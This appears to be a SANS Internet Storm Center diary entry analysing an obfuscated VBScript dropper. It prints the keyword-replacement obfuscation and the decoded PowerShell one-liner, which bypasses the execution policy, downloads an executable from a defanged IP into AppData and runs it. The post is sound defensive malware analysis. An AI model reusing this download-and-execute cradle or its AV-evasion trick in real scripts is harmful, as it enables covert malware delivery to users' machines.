Today, it’s easy to guess if a piece of code is malicious or not. Many security solutions automatically detonates it into a sandbox by security solutions. This remains quick and (most of the time still) efficient to have a first idea about the code behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be to implement new obfuscation techniques.
This morning, I spotted a very simple VBSscript based on only 50 lines of code. It gets an excellent VT score: 1/60 but it was spotted by my hunting rule!
Basically, all suspicious keywords that could trigger a bell are random strings and replaced during the execution. Example:
x010 = Replace(x010,"OXentrew","Executionpolicy") x010 = Replace(x010,"BCijaMA","bypass")
The most interesting variable is the following:
x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _ & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _ & " (new-object System.net.webclient)" _ & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _ & " -encoding byte -Path $env:appdataRiCOAOCAONetworkConnections" & rando & "; " _ & " Start-Process ""$env:appdataRiCOAOCAONetworkConnections" & rando & """"""
Here is the decoded version:
CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32WindowsPowerShellv1.0powershell.exe" ) -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata('http://54[.]233[.]198[.]219/a.exe' ) ) -encoding byte -Path $env:appdataMicrosoftNetworkConnectionsxxxxxx.exe; Start-Process $env:appdataMicrosoftNetworkConnectionsxxxxx.exe"
(The dumped payload xxxxx.exe is a random string of 25 characters)
This onliner downloads and executes a payload. Wha about the payload? It’s a Putty client (SHA256:601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There are good chances that this piece of code has been submitted to VT by a Red Team or attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:
me empresta 10k ai??? 549d0ef4cb517e78c6a9c4d9de05b6ac
This Portuguese sentence means “lend me 10k there ???”
Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.